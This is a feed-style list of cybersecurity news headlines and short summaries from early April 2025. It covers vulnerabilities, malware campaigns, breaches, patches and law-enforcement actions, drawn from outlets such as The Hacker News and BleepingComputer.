12.4.25 | Fortinet Warns Attackers Retain FortiGate Access Post-Patching via SSL-VPN Symlink Exploit | Fortinet has revealed that threat actors have found a way to maintain read-only access to vulnerable FortiGate devices even after the initial access vector used to | Exploit | The Hacker News |
11.4.25 | Paper Werewolf Deploys PowerModul Implant in Targeted Cyberattacks on Russian Sectors | The threat actor known as Paper Werewolf has been observed exclusively targeting Russian entities with a new implant called PowerModul. The activity, | Hack | The Hacker News |
11.4.25 | Palo Alto Networks Warns of Brute-Force Attempts Targeting PAN-OS GlobalProtect Gateways | Palo Alto Networks has revealed that it's observing brute-force login attempts against PAN-OS GlobalProtect gateways, days after threat hunters warned of a | Attack | The Hacker News |
11.4.25 | SpyNote, BadBazaar, MOONSHINE Malware Target Android and iOS Users via Fake Apps | Cybersecurity researchers have found that threat actors are setting up deceptive websites hosted on newly registered domains to deliver a known Android malware | Virus | The Hacker News |
11.4.25 | OttoKit WordPress Plugin Admin Creation Vulnerability Under Active Exploitation | A newly disclosed high-severity security flaw impacting OttoKit (formerly SureTriggers) has come under active exploitation within a few hours of public | Exploit | The Hacker News |
10.4.25 | New Mirai botnet behind surge in TVT DVR exploitation | A significant spike in exploitation attempts targeting TVT NVMS9000 DVRs has been detected, peaking on April 3, 2025, with over 2,500 unique IPs scanning for vulnerable devices. | BotNet | |
10.4.25 | AWS rolls out ML-KEM to secure TLS from quantum threats | Amazon Web Services (AWS) has added support for the ML-KEM post-quantum key encapsulation mechanism to AWS Key Management Service (KMS), AWS Certificate Manager (ACM), and AWS Secrets Manager, making TLS connections more secure. | Safety | |
10.4.25 | EncryptHub's dual life: Cybercriminal vs Windows bug-bounty researcher | EncryptHub, a notorious threat actor linked to breaches at 618 organizations, is believed to have reported two Windows zero-day vulnerabilities to Microsoft, revealing a conflicted figure straddling the line between cybercrime and security research. | CyberCrime | |
10.4.25 | Microsoft delays WSUS driver sync deprecation indefinitely | Microsoft announced today that, based on customer feedback, it will indefinitely delay removing driver synchronization in Windows Server Update Services (WSUS). | OS | |
10.4.25 | Six arrested for AI-powered investment scams that stole $20 million | Spain's police arrested six individuals behind a large-scale cryptocurrency investment scam that used AI tools to generate deepfake ads featuring popular public figures to lure people. | AI | BleepingComputer |
10.4.25 | Everest ransomware's dark web leak site defaced, now offline | The dark web leak site of the Everest ransomware gang has apparently been hacked over the weekend by an unknown attacker and is now offline. | Ransom | BleepingComputer |
10.4.25 | Google fixes Android zero-days exploited in attacks, 60 other flaws | Google has released patches for 62 vulnerabilities in Android's April 2025 security update, including two zero-days exploited in targeted attacks. | OS | BleepingComputer |
10.4.25 | Malicious VSCode extensions infect Windows with cryptominers | Nine VSCode extensions on Microsoft's Visual Studio Code Marketplace pose as legitimate development tools while infecting users with the XMRig cryptominer for Monero. | Cryptocurrency | BleepingComputer |
10.4.25 | Food giant WK Kellogg discloses data breach linked to Clop ransomware | US food giant WK Kellogg Co is warning employees and vendors that company data was stolen during the 2024 Cleo data theft attacks. | Incident | BleepingComputer |
10.4.25 | Windows 11 24H2 blocked on PCs with code-obfuscation driver BSODs | Microsoft has introduced a new Windows 11 24H2 safeguard hold for systems running security or enterprise software using SenseShield Technology's sprotect.sys driver. | OS | BleepingComputer |
10.4.25 | E-ZPass toll payment texts return in massive phishing wave | An ongoing phishing campaign impersonating E-ZPass and other toll agencies has surged recently, with recipients receiving multiple iMessage and SMS texts to steal personal and credit card information. | Phishing | BleepingComputer |
10.4.25 | OpenAI tests watermarking for ChatGPT-4o Image Generation model | OpenAI is reportedly testing a new "watermark" for the Image Generation model, which is a part of the ChatGPT 4o model. | AI | BleepingComputer |
10.4.25 | Carding tool abusing WooCommerce API downloaded 34K times on PyPI | A newly discovered malicious PyPI package named 'disgrasya' that abuses legitimate WooCommerce stores for validating stolen credit cards has been downloaded over 34,000 times from the open-source package platform. | Cryptocurrency | BleepingComputer |
10.4.25 | Incomplete Patch in NVIDIA Toolkit Leaves CVE-2024-0132 Open to Container Escapes | Cybersecurity researchers have detailed a case of an incomplete patch for a previously addressed security flaw impacting the NVIDIA Container Toolkit that, if | Vulnerability | The Hacker News |
10.4.25 | Malicious npm Package Targets Atomic Wallet, Exodus Users by Swapping Crypto Addresses | Threat actors are continuing to upload malicious packages to the npm registry so as to tamper with already-installed local versions of legitimate libraries and | Cryptocurrency | The Hacker News |
10.4.25 | Gamaredon Uses Infected Removable Drives to Breach Western Military Mission in Ukraine | The Russia-linked threat actor known as Gamaredon (aka Shuckworm) has been attributed to a cyber attack targeting a foreign military mission based in Ukraine | BigBrothers | The Hacker News |
10.4.25 | Europol Arrests Five SmokeLoader Clients Linked by Seized Database Evidence | Law enforcement authorities have announced that they tracked down the customers of the SmokeLoader malware and detained at least five individuals. "In | BigBrothers | The Hacker News |
10.4.25 | AkiraBot Targets 420,000 Sites with OpenAI-Generated Spam, Bypassing CAPTCHA Protections | Cybersecurity researchers have disclosed details of an artificial intelligence (AI) powered platform called AkiraBot that's used to spam website chats, comment | BotNet | The Hacker News |
9.4.25 | Lovable AI Found Most Vulnerable to VibeScamming — Enabling Anyone to Build Live Scam Pages | Lovable , a generative artificial intelligence (AI) powered platform that allows for creating full-stack web applications using text-based prompts, has been found to | AI | The Hacker News |
9.4.25 | New TCESB Malware Found in Active Attacks Exploiting ESET Security Scanner | A Chinese-affiliated threat actor known for its cyber-attacks in Asia has been observed exploiting a security flaw in security software from ESET to deliver a | Virus | The Hacker News |
9.4.25 | PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware | Microsoft has revealed that a now-patched security flaw impacting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware | Exploit | The Hacker News |
9.4.25 | CISA Warns of CentreStack's Hard-Coded MachineKey Vulnerability Enabling RCE Attacks | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday added a critical security flaw impacting Gladinet CentreStack to its Known | Vulnerability | The Hacker News |
9.4.25 | Microsoft Patches 126 Flaws Including Actively Exploited Windows CLFS Vulnerability | Microsoft has released security fixes to address a massive set of 126 flaws affecting its software products, including one vulnerability that it said has been | Vulnerability | The Hacker News |
9.4.25 | Adobe Patches 11 Critical ColdFusion Flaws Amid 30 Total Vulnerabilities Discovered | Adobe has released security updates to fix a fresh set of security flaws, including multiple critical-severity bugs in ColdFusion versions 2025, 2023 and 2021 that | Vulnerability | The Hacker News |
9.4.25 | Fortinet Urges FortiSwitch Upgrades to Patch Critical Admin Password Change Flaw | Fortinet has released security updates to address a critical security flaw impacting FortiSwitch that could permit an attacker to make unauthorized password | Vulnerability | The Hacker News |
9.4.25 | Amazon EC2 SSM Agent Flaw Patched After Privilege Escalation via Path Traversal | Cybersecurity researchers have disclosed details of a now-patched security flaw in the Amazon EC2 Simple Systems Manager (SSM) Agent that, if successfully | Vulnerability | The Hacker News |
9.4.25 | Cryptocurrency Miner and Clipper Malware Spread via SourceForge Cracked Software Listings | Threat actors have been observed distributing malicious payloads such as a cryptocurrency miner and clipper malware via SourceForge , a popular software | Cryptocurrency | The Hacker News |
8.4.25 | UAC-0226 Deploys GIFTEDCROOK Stealer via Malicious Excel Files Targeting Ukraine | The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed a new set of cyber attacks targeting Ukrainian institutions with information-stealing | BigBrothers | The Hacker News |
8.4.25 | CISA Adds CrushFTP Vulnerability to KEV Catalog Following Confirmed Active Exploitation | A recently disclosed critical security flaw impacting CrushFTP has been added by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its Known | Vulnerability | The Hacker News |
8.4.25 | Google Releases Android Update to Patch Two Actively Exploited Vulnerabilities | Google has shipped patches for 62 vulnerabilities, two of which it said have been exploited in the wild. The two high-severity vulnerabilities are listed below - CVE- | Vulnerability | The Hacker News |
7.4.25 | CISA and FBI Warn Fast Flux is Powering Resilient Malware, C2, and Phishing Networks | Cybersecurity agencies from Australia, Canada, New Zealand, and the United States have published a joint advisory about the risks associated with a technique | BigBrothers | The Hacker News |
7.4.25 | PoisonSeed Exploits CRM Accounts to Launch Cryptocurrency Seed Phrase Poisoning Attacks | A malicious campaign dubbed PoisonSeed is leveraging compromised credentials associated with customer relationship management (CRM) tools and bulk email | Cryptocurrency | The Hacker News |
6.4.25 | The beginning of the end: the story of Hunters International | Technical details of the ransomware and the Storage Software tool, how the criminals use the affiliate panel, and the history of the Hunters International ransomware group from its emergence to the end of the operation. | BigBrother blog | Group-IB |
6.4.25 | Microsoft Credits EncryptHub, Hacker Behind 618+ Breaches, for Disclosing Windows Flaws | A likely lone wolf actor behind the EncryptHub persona was acknowledged by Microsoft for discovering and reporting two security flaws in Windows last month, | Vulnerability | The Hacker News |
6.4.25 | Coinbase to fix 2FA account activity entry freaking out users | Coinbase is fixing an incorrect account activity message that freaks out customers and makes them think their credentials were compromised. | Cryptocurrency | |
6.4.25 | WinRAR flaw bypasses Windows Mark of the Web security alerts | A vulnerability in the WinRAR file archiver solution could be exploited to bypass the Mark of the Web (MotW) security warning and execute arbitrary code on a Windows machine. | Vulnerability | |
6.4.25 | Port of Seattle says ransomware breach impacts 90,000 people | Port of Seattle, the U.S. government agency overseeing Seattle's seaport and airport, is notifying roughly 90,000 individuals of a data breach after their personal information was stolen in an August 2024 ransomware attack. | Ransom | |
6.4.25 | PoisonSeed phishing campaign behind emails with wallet seed phrases | A large-scale phishing campaign dubbed 'PoisonSeed' compromises corporate email marketing accounts to distribute emails containing crypto seed phrases used to drain cryptocurrency wallets. | Phishing | |
6.4.25 | Australian pension funds hit by wave of credential stuffing attacks | Over the weekend, a massive wave of credential stuffing attacks hit multiple large Australian super funds, compromising thousands of members' accounts. | Incident | BleepingComputer |
6.4.25 | Europcar GitLab breach exposes data of up to 200,000 customers | A hacker breached the GitLab repositories of multinational car-rental company Europcar Mobility Group and stole source code for Android and iOS applications, as well as some personal information belonging to up to 200,000 users. | Incident | BleepingComputer |
6.4.25 | OpenAI's $20 ChatGPT Plus is now free for students until the end of May | The ChatGPT Plus subscription is now free, but only if you're a student based in the United States or Canada. | AI | BleepingComputer |
6.4.25 | Max severity RCE flaw discovered in widely used Apache Parquet | A maximum severity remote code execution (RCE) vulnerability has been discovered impacting all versions of Apache Parquet up to and including 1.15.0. | Vulnerability | BleepingComputer |
6.4.25 | Hunters International shifts from ransomware to pure data extortion | The Hunters International Ransomware-as-a-Service (RaaS) operation is shutting down and rebranding with plans to switch to data theft and extortion-only attacks. | Ransom | BleepingComputer |
6.4.25 | Microsoft starts testing Windows 11 taskbar icon scaling | Microsoft is testing a new taskbar icon scaling feature that automatically scales down Windows taskbar icons to show more apps when it gets too overcrowded. | OS | |
6.4.25 | CISA warns of Fast Flux DNS evasion used by cybercrime gangs | CISA, the FBI, the NSA, and international cybersecurity agencies are calling on organizations and DNS providers to mitigate the "Fast Flux" cybercrime evasion technique used by state-sponsored threat actors and ransomware gangs. | BigBrothers | |
6.4.25 | Ivanti patches Connect Secure zero-day exploited since mid-March | Ivanti has released security updates to patch a critical Connect Secure remote code execution vulnerability exploited by a China-linked espionage actor to deploy malware since at least mid-March 2025. | Vulnerability | |
6.4.25 | Texas State Bar warns of data breach after INC ransomware claims attack | The State Bar of Texas is warning it suffered a data breach after the INC ransomware gang claimed to have breached the organization and began leaking samples of stolen data. | Ransom | BleepingComputer |
6.4.25 | Oracle privately confirms Cloud breach to customers | Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a "legacy environment" last used in 2017. | Security | BleepingComputer |
6.4.25 | Recent GitHub supply chain attack traced to leaked SpotBugs token | A cascading supply chain attack on GitHub that targeted Coinbase in March has now been traced back to a single token stolen from a SpotBugs workflow, which allowed a threat actor to compromise multiple GitHub projects. | Hack | BleepingComputer |
6.4.25 | Genetic data site openSNP to close and delete data over privacy concerns | The openSNP project, a platform for sharing genetic and phenotypic data, will shut down on April 30, 2025, and delete all user submissions over privacy concerns and the risk of misuse by authoritarian governments. | Security | BleepingComputer |
6.4.25 | Verizon Call Filter API flaw exposed customers' incoming call history | A vulnerability in Verizon's Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. | Vulnerability | BleepingComputer |
5.4.25 | North Korean Hackers Deploy BeaverTail Malware via 11 Malicious npm Packages | The North Korean threat actors behind the ongoing Contagious Interview campaign are spreading their tentacles on the npm ecosystem by publishing more | Virus | The Hacker News |
5.4.25 | Malicious Python Packages on PyPI Downloaded 39,000+ Times, Steal Sensitive Data | Cybersecurity researchers have uncovered malicious libraries in the Python Package Index (PyPI) repository that are designed to steal sensitive information. | Virus | The Hacker News |
5.4.25 | GitHub expands security tools after 39 million secrets leaked in 2024 | Over 39 million secrets like API keys and account credentials were leaked on GitHub throughout 2024, exposing organizations and users to significant security risks. | Incident | |
5.4.25 | Microsoft adds hotpatching support to Windows 11 Enterprise | Microsoft has announced that hotpatch updates are now available for business customers using Windows 11 Enterprise 24H2 on x64 (AMD/Intel) systems, starting today. | OS | |
5.4.25 | Royal Mail investigates data leak claims, no impact on operations | Royal Mail is investigating claims of a security breach after a threat actor leaked over 144GB of data allegedly stolen from the company's systems. | Incident | |
5.4.25 | ChatGPT is down worldwide with something went wrong error | ChatGPT, the famous artificial intelligence chatbot that allows users to converse with various personalities and topics, has connectivity issues worldwide. | AI | |
5.4.25 | Police shut down Kidflix child sexual exploitation platform | Kidflix, one of the largest platforms used to host, share, and stream child sexual abuse material (CSAM) on the dark web, was shut down on March 11 following a joint action coordinated by German law enforcement. | CyberCrime | BleepingComputer |
5.4.25 | Counterfeit Android devices found preloaded with Triada malware | A new version of the Triada trojan has been discovered preinstalled on thousands of new Android devices, allowing threat actors to steal data as soon as they are set up. | Virus | BleepingComputer |
5.4.25 | Cisco warns of CSLU backdoor admin account used in attacks | Cisco warns admins to patch a critical Cisco Smart Licensing Utility (CSLU) vulnerability, which exposes a built-in backdoor admin account now used in attacks. | Vulnerability | BleepingComputer |
5.4.25 | New Windows 11 trick lets you bypass Microsoft Account requirement | A previously unknown trick lets you easily bypass using a Microsoft Account in Windows 11, just as Microsoft tries to make it harder to use local accounts. | OS | BleepingComputer |
5.4.25 | North Korean IT worker army expands operations in Europe | North Korea's IT workers have expanded operations beyond the United States and are now increasingly targeting organizations across Europe. | APT | BleepingComputer |
5.4.25 | Google rolls out easy end-to-end encryption for Gmail business users | Google has started rolling out a new end-to-end encryption (E2EE) model for Gmail enterprise users, making it easier to send encrypted emails to any recipient. | Safety | |
5.4.25 | Nearly 24,000 IPs behind wave of Palo Alto Global Protect scans | A significant spike in scanning activity targeting Palo Alto Networks GlobalProtect login portals has been observed, with researchers concerned it may be a prelude to an upcoming attack or flaw being exploited. | Security | |
5.4.25 | Apple backports zero-day patches to older iPhones and Macs | Apple has released security updates that backport fixes for actively exploited vulnerabilities that were exploited as zero-days to older versions of its operating systems. | OS | |
5.4.25 | Critical auth bypass bug in CrushFTP now exploited in attacks | Attackers are now targeting a critical authentication bypass vulnerability in the CrushFTP file transfer software using exploits based on publicly available proof-of-concept code. | Vulnerability | BleepingComputer |
5.4.25 | VMware Workstation auto-updates broken after Broadcom URL redirect | VMware Workstation users report that the software's automatic update functionality is broken after Broadcom redirected the download URL to its generic support page, triggering certificate errors. | Security | BleepingComputer |
5.4.25 | OpenAI says Deep Research is coming to ChatGPT free "very soon" | OpenAI has confirmed that its powerful AI agent "Deep Research" will begin rolling out to free users "very soon." At the moment, Deep Research is available only for Plus and Enterprise customers. | AI | BleepingComputer |
5.4.25 | SpotBugs Access Token Theft Identified as Root Cause of GitHub Supply Chain Attack | The cascading supply chain attack that initially targeted Coinbase before becoming more widespread to single out users of the "tj-actions/changed-files" | Hack | The Hacker News |
5.4.25 | Ransomware Attack Levels Remain High as Major Change Looms | March saw a potential leadership shift in ransomware attacks, sustained high attack volumes, and the rise of new threat groups. | Ransom blog | Cyble |
5.4.25 | Critical CrushFTP Authentication Bypass (CVE-2025-2825) Exposes Servers to Remote Attacks | The SonicWall Capture Labs threat research team became aware of an authentication bypass vulnerability in CrushFTP servers, assessed its impact, and developed mitigation measures. CrushFTP is an enterprise-grade file transfer application used widely among organizations. It supports multiple protocols for data exchange among systems and users, along with S3-compatible API access. | Vulnerability blog | SonicWall |
5.4.25 | Hexamethy Ransomware Displays Scary Lock Screen During File Encryption | The SonicWall Capture Labs threat research team has recently observed new ransomware named HEXAMETHYLCYCLOTRISILOXANE, or Hexamethy in short. This malware produces a scary cinematic display during the encryption process and flashes text stating, “No more files for you,” and “Your files are in hostage by the HEXAMETHYLCYCLOTRISILOXANE Ransomware.” | Ransom blog | SonicWall |
5.4.25 | Evolution of Sophisticated Phishing Tactics: The QR Code Phenomenon | Since late 2024, Unit 42 researchers have observed attackers using several new tactics in phishing documents containing QR codes. One tactic involves attackers concealing the final phishing destination using legitimate websites' redirection mechanisms. | Phishing blog | Palo Alto |
5.4.25 | OH-MY-DC: OIDC Misconfigurations in CI/CD | In the course of investigating the use of OpenID Connect (OIDC) within continuous integration and continuous deployment (CI/CD) environments, Unit 42 researchers discovered problematic patterns and implementations that could be leveraged by threat actors to gain access to restricted resources. One instance of such an implementation was identified in CircleCI’s OIDC. | Cyber blog | Palo Alto |
5.4.25 | The good, the bad and the unknown of AI: A Q&A with Mária Bieliková | The computer scientist and AI researcher shares her thoughts on the technology’s potential and pitfalls – and what may lie ahead for us | AI blog | ESET |
5.4.25 | This month in security with Tony Anscombe – March 2025 edition | From an exploited vulnerability in a third-party ChatGPT tool to a bizarre twist on ransomware demands, it's a wrap on another month filled with impactful cybersecurity news | Cyber blog | |
5.4.25 | Resilience in the face of ransomware: A key to business survival | Your company’s ability to tackle the ransomware threat head-on can ultimately be a competitive advantage | Cyber blog | |
5.4.25 | The Bug Report - March 2025 Edition | March Madness hits infosec: kernel bugs, Tomcat deserialization, and SonicWall shenanigans. Catch the highlights and patch fast before you’re benched! | Vulnerability blog | Trellix |
4.4.25 | Microsoft uses AI to find flaws in GRUB2, U-Boot, Barebox bootloaders | Microsoft used its AI-powered Security Copilot to discover 20 previously unknown vulnerabilities in the GRUB2, U-Boot, and Barebox open-source bootloaders. | AI | |
4.4.25 | Phishing platform 'Lucid' behind wave of iOS, Android SMS attacks | A phishing-as-a-service (PhaaS) platform named 'Lucid' has been targeting 169 entities in 88 countries using well-crafted messages sent on iMessage (iOS) and RCS (Android). | Phishing | |
4.4.25 | Hackers abuse WordPress MU-Plugins to hide malicious code | Hackers are utilizing the WordPress mu-plugins ("Must-Use Plugins") directory to stealthily run malicious code on every page while evading detection. | Virus | |
4.4.25 | North Korean hackers adopt ClickFix attacks to target crypto firms | The notorious North Korean Lazarus hacking group has reportedly adopted 'ClickFix' tactics to deploy malware targeting job seekers in the cryptocurrency industry, particularly centralized finance (CeFi). | APT | |
4.4.25 | Microsoft tests new Windows 11 tool to remotely fix boot crashes | Microsoft has begun testing a new Windows 11 tool called Quick Machine Recovery, which is designed to remotely deploy fixes for buggy drivers and configurations that prevent the operating system from starting. | OS | |
4.4.25 | New Crocodilus malware steals Android users’ crypto wallet keys | A newly discovered Android malware dubbed Crocodilus tricks users into providing the seed phrase for their cryptocurrency wallet by showing a warning to back up the key to avoid losing access. | Virus | |
4.4.25 | Microsoft's killing script used to avoid Microsoft Account in Windows 11 | Microsoft has removed the 'BypassNRO.cmd' script from Windows 11 preview builds, which allowed users to bypass the requirement to use a Microsoft Account when installing the operating system. | OS | BleepingComputer |
4.4.25 | Critical Ivanti Flaw Actively Exploited to Deploy TRAILBLAZE and BRUSHFIRE Malware | Ivanti has disclosed details of a now-patched critical security vulnerability impacting its Connect Secure that has come under active exploitation in the wild. | Vulnerability | The Hacker News |
4.4.25 | OPSEC Failure Exposes Coquettte's Malware Campaigns on Bulletproof Hosting Servers | A novice cybercrime actor has been observed leveraging the services of a Russian bulletproof hosting ( BPH ) provider called Proton66 to facilitate their operations. | Virus | |
4.4.25 | CERT-UA Reports Cyberattacks Targeting Ukrainian State Systems with WRECKSTEEL Malware | The Computer Emergency Response Team of Ukraine (CERT-UA) has revealed that no less than three cyber attacks were recorded against state administration | Virus | |
4.4.25 | Critical Flaw in Apache Parquet Allows Remote Attackers to Execute Arbitrary Code | A maximum severity security vulnerability has been disclosed in Apache Parquet's Java Library that, if successfully exploited, could allow a remote attacker to | Vulnerability | The Hacker News |
4.4.25 | Microsoft Warns of Tax-Themed Email Attacks Using PDFs and QR Codes to Deliver Malware | Microsoft is warning of several phishing campaigns that are leveraging tax-related themes to deploy malware and steal credentials. "These campaigns notably use | Phishing | The Hacker News |
4.4.25 | New Report Explains Why CASB Solutions Fail to Address Shadow SaaS and How to Fix It | Whether it's CRMs, project management tools, payment processors, or lead management tools - your workforce is using SaaS applications by the pound. | Vulnerability | |
4.4.25 | Lazarus Group Targets Job Seekers With ClickFix Tactic to Deploy GolangGhost Malware | The North Korean threat actors behind Contagious Interview have adopted the increasingly popular ClickFix social engineering tactic to lure job seekers in the | APT | The Hacker News |
3.4.25 | Google Patches Quick Share Vulnerability Enabling Silent File Transfers Without Consent | Cybersecurity researchers have disclosed details of a new vulnerability impacting Google's Quick Share data transfer utility for Windows that could be exploited to | Vulnerability | |
3.4.25 | Triada Malware Preloaded on Counterfeit Android Phones Infects 2,600+ Devices | Counterfeit versions of popular smartphone models that are sold at reduced prices have been found to be preloaded with a modified version of an Android | Virus | |
3.4.25 | Legacy Stripe API Exploited to Validate Stolen Payment Cards in Web Skimmer Campaign | Threat hunters are warning of a sophisticated web skimmer campaign that leverages a legacy application programming interface (API) from payment | Exploit | The Hacker News |
3.4.25 | Europol Dismantles Kidflix With 72,000 CSAM Videos Seized in Major Operation | In one of the largest coordinated law enforcement operations, authorities have dismantled Kidflix, a streaming platform that offered child sexual abuse material | CyberCrime | The Hacker News |
3.4.25 | Google Fixed Cloud Run Vulnerability Allowing Unauthorized Image Access via IAM Misuse | Cybersecurity researchers have disclosed details of a now-patched privilege escalation vulnerability in Google Cloud Platform (GCP) Cloud Run that could have | Vulnerability | |
2.4.25 | Outlaw Group Uses SSH Brute-Force to Deploy Cryptojacking Malware on Linux Servers | Cybersecurity researchers have shed light on an "auto-propagating" cryptocurrency mining botnet called Outlaw (aka Dota) that's known for targeting SSH servers with | Cryptocurrency | |
2.4.25 | FIN7 Deploys Anubis Backdoor to Hijack Windows Systems via Compromised SharePoint Sites | The financially motivated threat actor known as FIN7 has been linked to a Python-based backdoor called Anubis (not to be confused with an Android banking trojan | APT | |
2.4.25 | New Malware Loaders Use Call Stack Spoofing, GitHub C2, and .NET Reactor for Stealth | Cybersecurity researchers have discovered an updated version of a malware loader called Hijack Loader that implements new features to evade detection and establish persistence on compromised systems. "Hijack Loader released a new | Virus | The Hacker News |
2.4.25 | Over 1,500 PostgreSQL Servers Compromised in Fileless Cryptocurrency Mining Campaign | Exposed PostgreSQL instances are the target of an ongoing campaign designed to gain unauthorized access and deploy cryptocurrency miners. Cloud security firm | Cryptocurrency | The Hacker News |
2.4.25 | Enterprise Gmail Users Can Now Send End-to-End Encrypted Emails to Any Platform | On the 21st birthday of Gmail , Google has announced a major update that allows enterprise users to send end-to-end encrypted (E2EE) emails to any user in any email | Safety | |
2.4.25 | Lucid PhaaS Hits 169 Targets in 88 Countries Using iMessage and RCS Smishing | A new sophisticated phishing-as-a-service (PhaaS) platform called Lucid has targeted 169 entities in 88 countries using smishing messages propagated via | Phishing | |
1.4.25 | Apple Backports Critical Fixes for 3 Recent 0-Days Impacting Older iOS and macOS Devices | Apple on Monday backported fixes for three vulnerabilities that have come under active exploitation in the wild to older models and previous versions of the | OS | The Hacker News |
1.4.25 | Nearly 24,000 IPs Target PAN-OS GlobalProtect in Coordinated Login Scan Campaign | Cybersecurity researchers are warning of a spike in suspicious login scanning activity targeting Palo Alto Networks PAN-OS GlobalProtect gateways, with nearly | Hack | |
1.4.25 | China-Linked Earth Alux Uses VARGEIT and COBEACON in Multi-Stage Cyber Intrusions | Cybersecurity researchers have shed light on a new China-linked threat actor called Earth Alux that has targeted various key sectors such as government, | APT | |
1.4.25 | Apple Fined €150 Million by French Regulator Over Discriminatory ATT Consent Practices | Apple has been hit with a fine of €150 million ($162 million) by France's competition watchdog over the implementation of its App Tracking Transparency | OS | The Hacker News |
1.4.25 | Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWisp | The threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors | Virus |